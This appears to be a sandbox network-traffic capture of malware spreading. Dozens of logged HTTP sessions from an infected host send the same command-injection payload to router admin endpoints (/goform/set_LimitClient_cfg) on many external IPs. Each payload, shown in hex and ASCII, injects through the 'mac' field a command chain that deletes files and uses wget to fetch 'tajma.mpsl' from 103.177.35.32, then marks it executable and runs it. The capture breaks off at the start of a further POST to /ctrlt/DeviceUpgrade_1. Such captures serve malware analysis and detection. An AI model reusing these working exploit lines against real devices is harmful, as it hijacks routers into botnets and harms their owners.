                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        790192.168.2.235139223.205.235.2198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401767015 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        791192.168.2.234527462.187.86.888080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401767015 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        792192.168.2.2357498204.145.6.1218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401808977 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        793192.168.2.2346384115.168.245.138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401834011 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        794192.168.2.2355402142.143.69.1858080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401849985 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        795192.168.2.2356016204.42.131.918080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401853085 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        796192.168.2.235644685.24.117.2438080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.401887894 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        797192.168.2.2357948163.84.226.1428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.402264118 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        798192.168.2.2345852135.136.58.368080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.402374029 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        799192.168.2.2341394161.165.45.2148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.402375937 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        800192.168.2.23510805.145.40.1878080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.402381897 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        801192.168.2.234062663.138.254.488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.402456999 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        802192.168.2.234856435.92.153.908080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.402512074 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        803192.168.2.23586641.203.95.1878080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.402520895 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        804192.168.2.235662057.149.5.2218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.402523041 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        805192.168.2.234031680.229.254.778080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.402525902 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        806192.168.2.235420645.237.255.1918080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.402539968 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        807192.168.2.2344586141.42.135.478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.402544975 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        808192.168.2.2360210112.198.54.1198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.402558088 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        809192.168.2.2354892132.53.71.1868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.402590990 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        810192.168.2.2359074113.231.143.1268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.402616978 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        811192.168.2.235202435.7.46.548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.427153111 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        812192.168.2.235732241.173.120.4537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.483000040 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
